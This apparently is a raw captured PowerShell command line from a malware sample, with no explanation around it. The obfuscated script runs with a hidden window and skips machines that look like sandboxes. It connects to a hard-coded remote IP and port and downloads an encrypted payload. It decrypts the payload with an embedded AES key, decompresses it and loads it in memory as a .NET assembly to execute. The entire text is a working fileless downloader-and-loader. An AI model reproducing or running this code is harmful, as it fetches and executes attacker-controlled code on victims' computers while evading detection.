powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command if ([System.Environment]::GetEnvironmentVariables().Count -lt 10) {exit -65536;} $typiconBooties = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('OTEuMjE1Ljg1LjE5OA==')); $elidesDiggers = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('NDU5MzQ=')); $agentsTypicon = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('M2EyNWE=')); $elidesBooties = new-object System.Net.Sockets.TcpClient; $elidesBooties.Connect($typiconBooties, [int]$elidesDiggers); $moniasBecram = $elidesBooties.GetStream(); $elidesBooties.SendTimeout = 300000; $elidesBooties.ReceiveTimeout = 300000; $lingasElides = [System.Text.StringBuilder]::new(); $lingasElides.AppendLine('GET /' + $agentsTypicon); $lingasElides.AppendLine('Host: ' + $typiconBooties); $lingasElides.AppendLine(); $bootiesMonias = [System.Text.Encoding]::ASCII.GetBytes($lingasElides.ToString()); $moniasBecram.Write($bootiesMonias, 0, $bootiesMonias.Length); $moniasAgents = New-Object System.IO.MemoryStream; $moniasBecram.CopyTo($moniasAgents); $moniasBecram.Dispose(); $elidesBooties.Dispose(); $moniasAgents.Position = 0; $bootiesDiggers = $moniasAgents.ToArray(); $moniasAgents.Dispose(); $lingasAgents = [System.Text.Encoding]::ASCII.GetString($bootiesDiggers).IndexOf('`r`n`r`n')+1; $lingasTypicon = [System.Text.Encoding]::ASCII.GetString($bootiesDiggers[$lingasAgents..($bootiesDiggers.Length-1)]); $lingasTypicon = [System.Convert]::FromBase64String($lingasTypicon); $diggersCuittle = New-Object System.Security.Cryptography.AesManaged; $diggersCuittle.Mode = [System.Security.Cryptography.CipherMode]::CBC; $diggersCuittle.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7; $diggersCuittle.Key = [System.Convert]::FromBase64String('bTBxHoHlsFE1FusIuQOatttX0kgSSC4OKDkQ+IjagWQ='); $diggersCuittle.IV = [System.Convert]::FromBase64String('VB4EnrJD2qF3uAbX2nckFA=='); $typiconMonias = $diggersCuittle.CreateDecryptor(); $lingasTypicon = $typiconMonias.TransformFinalBlock($lingasTypicon, 0, $lingasTypicon.Length); $typiconMonias.Dispose(); $diggersCuittle.Dispose(); $agentsBecram = New-Object System.IO.MemoryStream(, $lingasTypicon); $cristiDiggers = New-Object System.IO.MemoryStream; $diggersMonias = New-Object System.IO.Compression.GZipStream($agentsBecram, [IO.Compression.CompressionMode]::Decompress); $diggersMonias.CopyTo($cristiDiggers); $lingasTypicon = $cristiDiggers.ToArray(); $agentsBooties = [System.Reflection.Assembly]::Load($lingasTypicon); $moniasDiggers = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZmlzdHVjYUZyYWdoYW4=')); $elidesMonias = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('bGluZ2FzQ3VpdHRsZQ==')); $bootiesAgents = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('Ym9vdGllc0VsaWRlcw==')); $bootiesCristi = $agentsBooties.GetType($moniasDiggers + '.' + $elidesMonias); $elidesLingas = $bootiesCristi.GetMethod($bootiesAgents); $elidesLingas.Invoke($cuittleBooties, (, [string[]] ('C:\Users\test22\AppData\Local\Temp\originalbuild.exe'))); #($cuittleBooties, $cuittleBooties);
2692